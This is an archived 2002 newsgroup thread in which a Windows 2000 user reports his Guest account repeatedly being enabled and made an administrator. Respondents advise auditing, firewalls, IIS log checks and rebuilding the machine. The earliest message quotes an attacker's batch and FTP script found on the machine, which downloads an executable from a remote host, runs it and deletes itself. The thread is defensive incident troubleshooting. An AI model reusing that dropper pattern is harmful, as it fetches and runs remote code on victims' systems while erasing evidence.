Re: Is it really true that NTFS is secure?

From: Eric Chamberlain (eric-newsgroups@pacbell.net)
Date: 12/14/02 

From: "Eric Chamberlain" <eric-newsgroups@pacbell.net>
Date: Sat, 14 Dec 2002 11:46:27 -0800

George,

There is nothing wrong with Windows 2000. Your machine has been
compromised. Something third-party is running as administrator and making
the changes. You can try and track it down, but there is no way to tell
what files have been compromised. Your best solution is to backup your data
and rebuild the machine. 

--
Eric Chamberlain, CISSP
"George Hester" <hesterloli@hotmail.com> wrote in message
news:eIVJI35oCHA.2160@TK2MSFTNGP12...
Thanks Karl.  New update.
I had done logon Success\Failure.  All my Successs were Administrator
caused.  It WAS the Administrator account that was being used to reenable
the Users Guest account and it was the Administrator account that was
putting the Administrator account in the Group Guest account.
Now I have fixed this damn issue and I don't believe it has anything to do
with a malicious machine from outside doing this.  There is something wrong
with Windows 2000 it looks to me.
This is what I did.  I removed the Users Guest account form the Groups Guest
account.  The Groups Guest account is at this moment empty.  I then changed
the Users IUSR_MachineName account to be a member of the Groups Users
account.  I then disabled the Users Guest account.
And that's the end of that story.  It seems to me my machine was doing this
on its own.  I (the Administrator) was NOT enabling the Users Group account.
In fact I was disabling it everytime I would find it enabled.  And it would
go back to enabled about 1 or 2 hours AFTER I had disabled it.  And the
Administrator account was doing this.
The junk I sent you earlier this always happens.  I really don't think it is
specifiaclly directed at me.  I really do not know why this crap happens but
I can assure you it had nothing to do with my complaint in this matter.
Looks to me this is a flaw with Windows 2000 Professional then anything
else.
Thanks for everyone's suggestions.
--
George Hester
__________________________________
"Karl Levinson [x y] mvp" <jamescagney90210@excite.com> wrote in message
news:#5NHiL3oCHA.392@TK2MSFTNGP12...
> Enable failure auditing for everything listed in the auditing section in
> Group Policy, but more importantly I would think you'd enable both success
> and failure auditing starting with "Audit Account Management," and also
try
> enabling both success and failure auditing for "privilege use," though you
> might have to remove success auditing on this or other items if this
> generates too many events.  Might as well audit success and failure for
> "policy change" as well, just in case.
>
> If you haven't already, look up the trojans found at the web site for the
> software that found them [or www.sarc.com if necessary] to try to find out
> how they work and whether they cause anything like this.
>
>
> "George Hester" <hesterloli@hotmail.com> wrote in message
> news:eGc4B4woCHA.1888@TK2MSFTNGP09...
> Update.
>
> The account Group got put back in the Administrator group again.  I had
> audits going and here is the time\status in which this occurred:
>
> Event Source: Security
> Event Category: Account Logon
> Event ID: 681
> Date:  12/13/2002
> Time:  5:56:46 PM
> User:  NT AUTHORITY\SYSTEM
> Computer: MyMachineName
> Description:
> The logon to account: Administrator
>  by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
>  from workstation: HAMID-MSLR91LJD
>  failed. The error code was: 3221225578
>
> Event Type: Failure Audit
> Event Source: Security
> Event Category: Logon/Logoff
> Event ID: 529
> Date:  12/13/2002
> Time:  5:56:46 PM
> User:  NT AUTHORITY\SYSTEM
> Computer: MyMachineName
> Description:
> Logon Failure:
>   Reason:  Unknown user name or bad password
>   User Name: Administrator
>   Domain:  HAMID-MSLR91LJD
>   Logon Type: 3
>   Logon Process: NtLmSsp
>   Authentication Package: NTLM
>   Workstation Name: HAMID-MSLR91LJD
>
> Event Type: Failure Audit
> Event Source: Security
> Event Category: Account Logon
> Event ID: 681
> Date:  12/13/2002
> Time:  5:56:46 PM
> User:  NT AUTHORITY\SYSTEM
> Computer: MyMachineName
> Description:
> The logon to account: Administrator
>  by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
>  from workstation: HAMID-MSLR91LJD
>  failed. The error code was: 3221225578
>
> Event Type: Failure Audit
> Event Source: Security
> Event Category: Account Logon
> Event ID: 681
> Date:  12/13/2002
> Time:  7:41:52 PM
> User:  NT AUTHORITY\SYSTEM
> Computer: MyMachineName
> Description:
> The logon to account: Administrator
>  by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
>  from workstation: SAVVYEM
>  failed. The error code was: 3221225578
>
> Event Type: Failure Audit
> Event Source: Security
> Event Category: Logon/Logoff
> Event ID: 529
> Date:  12/13/2002
> Time:  7:41:52 PM
> User:  NT AUTHORITY\SYSTEM
> Computer: MyMachineName
> Description:
> Logon Failure:
>   Reason:  Unknown user name or bad password
>   User Name: Administrator
>   Domain:  SAVVYEM
>   Logon Type: 3
>   Logon Process: NtLmSsp
>   Authentication Package: NTLM
>   Workstation Name: SAVVYEM
>
> This last tried to sign on with user name root, admin, test, administrator
> and then finally gave up.  But my Guest User account is still changing to
> enabled and putting itself in the Administrator Group.  That action I am
not
> seeing in the Event Viewer anywhere.  What can I do to catch that event?
I
> believe I need the Guest group for IIS as IUSER_MachieName is in there.
> Please be detailed as I looked in Group Policy and cannot seem to find
what
> is necessary so I can see when that event occurs and what\who is
> responsible.  Thanks
>
> --
> George Hester
> __________________________________
> "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message
> news:#c7LZ5soCHA.2384@TK2MSFTNGP11...
> > You can enable auditing to watch for things like this:
> >
> > http://securityadmin.info/faq.htm#auditing
> >
> > Checking your IIS web logs is another common place to check.  Look for
> > anything that mentions .EXE or % and that also has a code 200 or 502 in
> that
> > line.  URLScan is a free IIS tool that comes with IISLockdown from
> > www.microsoft.com/technet/security that will block all this stuff, if
> that's
> > what this is.  Most firewalls won't detect or block this stuff.
> >
> > Be sure you have a firewall, as this will log all traffic to and from
your
> > server.  The firewall should also block NetBIOS traffic on TCP and UDP
> ports
> > 135-139 and 445 from the internet, as this is another way people could
be
> > accessing your guest account.
> >
> > Intrusion detection such as Black Ice or Snort [free] might be worth a
> try,
> > though getting Snort to alert just on interesting events on a Windows
> server
> > takes some knowledge.
> >
> > The free file change checker from www.gfi.com can also help you monitor
> your
> > system for intrusions not caught by antivirus, trojan scanners or
> firewalls.
> >
> > Other things to do to look for the source of the hacking and secure your
> > servers and computers are listed at:
> >
> > http://securityadmin.info/faq.htm#hacked  [first]
> > http://securityadmin.info/faq.htm#harden   [second]
> >
> >
> > "George Hester" <hesterloli@hotmail.com> wrote in message
> > news:ufXDRfmoCHA.2424@TK2MSFTNGP12...
> > Please understand that my machine comes up empty handed on all AV scans
> and
> > trojans.  I need to find some way of watching when this Group Policy
> change
> > happens.  Like a log.  That tells me the time that it happend or the
> > responsible party.  It doesn't show in Event Viewer.
> >
> > You know I ran a server W2K prior to this and never had this issue.
> Started
> > on Prof full time now and I am battling security it seems every hour.
> >
> > --
> > George Hester
> > __________________________________
> > "George Hester" <hesterloli@hotmail.com> wrote in message
> > news:OwrkSZmoCHA.2424@TK2MSFTNGP12...
> > Yes you may be able to help me with something.  My Guerst user keeps
> getting
> > enabled and  put in the Administrator group.  How?
> >
> > --
> > George Hester
> > __________________________________
> > "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message
> > news:eleuHGkoCHA.1628@TK2MSFTNGP12...
> > > Do you have a problem we could help you with?  Are there more details?
> > >
> > > What does this code have to do with NTFS?  I'm sorry if your machine
was
> > > exploited, though I'm not sure this has to do with NTFS.
> > >
> > > NTFS file permissions are plenty secure against remote exploits.  If
you
> > > have other security vulnerabilities that permit running commands as an
> > > account that has permissions in the NTFS ACLs, that's not exactly an
> NTFS
> > > failing.
> > >
> > > Windows 2000 configured correctly is as secure as most other operating
> > > systems configured correctly.  Windows 2000 in the default install is
> > about
> > > as un-secure as Linux in the default install, especially if you go
back
> to
> > > Linux from the year 2000.  Securing Windows 2000 is about as complex
and
> > > time consuming as securing Linux, maybe even easier.
> > >
> > > More information on ways to determine how you were hacked and how to
> > secure
> > > your computer:
> > >
> > > http://securityadmin.info/faq.htm#hacked
> > > http://securityadmin.info/faq.htm#re-secure
> > > http://securityadmin.info/faq.htm#harden
> > >
> > >
> > > "George Hester" <hesterloli@hotmail.com> wrote in message
> > > news:uB7a4afoCHA.2220@TK2MSFTNGP09...
> > > '--------- File: s.t sitting in %SystemRoot%\system32 ->
> > > open #my.ip.address#    'chnaged ip for privacy
> > > binary
> > > recv sui.exe .\sui.exe
> > > quit
> > > /-------- End of s.t
> > >
> > > REM File r.bat sitting in %SystemRoot%\system32 -->
> > > ftp -vnAs:s.t
> > > del s.t
> > > sui.exe -s678p345 -o
> > > call g.bat
> > > del r.bat
> > > REM End of r.bat --------
> > >
> > >
> > >
> > >
> >
> >
>
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.423 / Virus Database: 238 - Release Date: 11/25/2002
>
>

Relevant Pages

  • Re: Is it really true that NTFS is secure?
    ... Something third-party is running as administrator and making ... It WAS the Administrator account that was being used to reenable ... >> and failure auditing starting with "Audit Account Management," and also ... >> Event Category: Account Logon ...
    (microsoft.public.security)
  • [EC-SA-01.2003] Windows XP "welcome screen" exposes the names of all the members of the l
    ... logon screen with what is called "Welcome Screen". ... (including the original administrator account, ... Using the "welcome screen" actually disables / ignores the security ...
    (Bugtraq)
  • Re: Is it really true that NTFS is secure?
    ... > and failure auditing starting with "Audit Account Management," and also try ... > The account Group got put back in the Administrator group again. ... > The logon to account: ...
    (microsoft.public.security)
  • Re: Please help refresh my memory on AD DC
    ... When I boot my Laptop I reach the Logon screeen for XP Laptop and here I am ... administrator account. ... account to be able to Login so I can control it from the DC. ... A Server has websites already hosted on it in a Workgroup and now I join it ...
    (microsoft.public.windows.server.active_directory)
  • Re: Windows Logon Screen Changed and classic style now shows....
    ... computer you have a box in classic style saying windows is logging off. ... login name is the administrator with NO password. ... One of the updates for .net framework adds a user account. ... what causes the extra logon step. ...
    (microsoft.public.windowsxp.accessibility)